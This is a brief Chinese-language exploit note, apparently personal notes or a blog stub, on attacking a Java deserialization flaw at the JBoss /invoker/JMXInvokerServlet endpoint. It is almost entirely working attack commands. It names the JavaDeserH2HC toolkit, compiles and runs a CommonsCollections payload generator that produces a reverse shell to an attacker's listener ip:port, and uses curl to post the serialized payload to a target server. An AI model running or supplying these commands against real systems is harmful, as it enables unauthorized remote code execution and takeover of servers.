1.搭建环境
2.注解利用工具
2.通用工具
工具:JavaDeserH2HC.zip
下载地址:
命令
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //监听机的ip和端口
执行命令
漏洞路径:/invoker/JMXInvokerServlet
curl http://192.168.100.188:8080//invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser